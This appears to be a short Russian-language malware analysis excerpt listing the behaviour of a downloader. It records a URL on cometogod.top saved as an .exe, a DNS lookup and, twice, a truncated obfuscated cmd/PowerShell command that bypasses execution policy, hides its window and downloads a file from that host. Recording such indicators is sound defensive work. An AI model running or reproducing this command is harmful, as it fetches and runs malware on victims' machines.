Техническая информация
- http://cometogod.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POw^ershELL^.EX^e -eXEcu^ti^OnPo^LI^c^Y BYPAs^S ^-^nOpr^oFi^L^E^ -W^I^nDO^wStyle HIdDEn^ (New-^obj^ECt ^sy^S^T^em.^N^e^t^.WEB^C^l^Ie^Nt).dowNL^Oa^D^fil^E('http://cometogod.to...
- DNS ASK co###ogod.top
- '<SYSTEM32>\cmd.exe' /C "POw^ershELL^.EX^e -eXEcu^ti^OnPo^LI^c^Y BYPAs^S ^-^nOpr^oFi^L^E^ -W^I^nDO^wStyle HIdDEn^ (New-^obj^ECt ^sy^S^T^em.^N^e^t^.WEB^C^l^Ie^Nt).dowNL^Oa^D^fil^E('http://cometogod.to...' (со скрытым окном)